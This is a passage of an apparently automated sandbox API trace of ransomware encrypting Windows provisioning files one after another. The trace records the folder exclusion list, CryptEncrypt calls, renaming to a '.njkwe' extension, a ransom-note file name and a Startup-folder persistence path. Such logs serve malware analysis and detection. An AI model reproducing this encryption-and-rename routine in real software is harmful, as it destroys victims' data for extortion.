lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.466] CloseHandle (hObject=0x43c) returned 1 [0078.466] GetProcessHeap () returned 0xbe0000 [0078.466] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.466] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\344__connections_cellular_vodafone qatar (qatar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\344__connections_cellular_vodafone qatar (qatar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.467] GetProcessHeap () returned 0xbe0000 [0078.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.467] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cb6875, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cb6875, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cb6875, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", cAlternateFileName="345__C~1.PRO")) returned 1 [0078.467] lstrcmpiW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.467] lstrcmpiW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.467] lstrcmpiW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.467] lstrcmpiW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.467] lstrcmpiW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.467] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml") returned 166 [0078.467] StrStrIW (lpFirst="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.467] lstrcmpW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.467] lstrcmpW (lpString1="345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.467] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\345__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\345__connections_cellular_vodafone qatar (qatar)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.468] GetTickCount () returned 0x1153f28 [0078.468] GetTickCount () returned 0x1153f28 [0078.468] GetTickCount () returned 0x1153f28 [0078.468] GetTickCount () returned 0x1153f28 [0078.468] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.468] GetProcessHeap () returned 0xbe0000 [0078.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.468] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.492] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.492] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.493] GetProcessHeap () returned 0xbe0000 [0078.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.493] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.494] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.494] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.494] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.494] CloseHandle (hObject=0x43c) returned 1 [0078.494] GetProcessHeap () returned 0xbe0000 [0078.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.494] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\345__connections_cellular_vodafone qatar (qatar)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\345__Connections_Cellular_Vodafone Qatar (Qatar)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\345__connections_cellular_vodafone qatar (qatar)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.497] GetProcessHeap () returned 0xbe0000 [0078.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.497] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cb6875, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cb6875, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cb6875, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="346__C~1.PRO")) returned 1 [0078.497] lstrcmpiW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.497] lstrcmpiW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.497] lstrcmpiW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.497] lstrcmpiW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.497] lstrcmpiW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.497] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.497] StrStrIW (lpFirst="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.497] lstrcmpW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.497] lstrcmpW (lpString1="346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.497] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\346__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.497] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\346__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.497] GetTickCount () returned 0x1153f47 [0078.497] GetTickCount () returned 0x1153f47 [0078.497] GetTickCount () returned 0x1153f47 [0078.497] GetTickCount () returned 0x1153f47 [0078.498] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.498] GetProcessHeap () returned 0xbe0000 [0078.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.498] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.499] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.499] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.499] GetProcessHeap () returned 0xbe0000 [0078.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.499] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.499] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.500] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.500] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.500] CloseHandle (hObject=0x43c) returned 1 [0078.500] GetProcessHeap () returned 0xbe0000 [0078.500] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.500] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\346__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\346__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\346__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.501] GetProcessHeap () returned 0xbe0000 [0078.501] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.501] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cb6875, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cb6875, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cdcae1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", cAlternateFileName="347__C~1.PRO")) returned 1 [0078.501] lstrcmpiW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.501] lstrcmpiW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.501] lstrcmpiW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.501] lstrcmpiW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.501] lstrcmpiW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.501] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml") returned 174 [0078.501] StrStrIW (lpFirst="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.501] lstrcmpW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.501] lstrcmpW (lpString1="347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.501] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\347__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\347__connections_cellular_moldcell (republic of moldova)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.502] GetTickCount () returned 0x1153f47 [0078.502] GetTickCount () returned 0x1153f47 [0078.502] GetTickCount () returned 0x1153f47 [0078.502] GetTickCount () returned 0x1153f47 [0078.502] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.502] GetProcessHeap () returned 0xbe0000 [0078.502] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.503] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.504] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.504] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.504] GetProcessHeap () returned 0xbe0000 [0078.504] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.504] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.504] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.504] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.504] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.505] CloseHandle (hObject=0x43c) returned 1 [0078.505] GetProcessHeap () returned 0xbe0000 [0078.505] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.505] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 194 [0078.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\347__connections_cellular_moldcell (republic of moldova)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\347__Connections_Cellular_MoldCell (Republic of Moldova)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\347__connections_cellular_moldcell (republic of moldova)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.505] GetProcessHeap () returned 0xbe0000 [0078.505] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.505] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cdcae1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cdcae1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cdcae1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="348__C~1.PRO")) returned 1 [0078.508] lstrcmpiW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.508] lstrcmpiW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.508] lstrcmpiW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.508] lstrcmpiW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.508] lstrcmpiW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.508] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml") returned 166 [0078.508] StrStrIW (lpFirst="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.508] lstrcmpW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.508] lstrcmpW (lpString1="348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.508] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\348__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\348__connections_cellular_sfr (réunion) (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.508] GetTickCount () returned 0x1153f47 [0078.508] GetTickCount () returned 0x1153f47 [0078.508] GetTickCount () returned 0x1153f47 [0078.508] GetTickCount () returned 0x1153f47 [0078.508] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 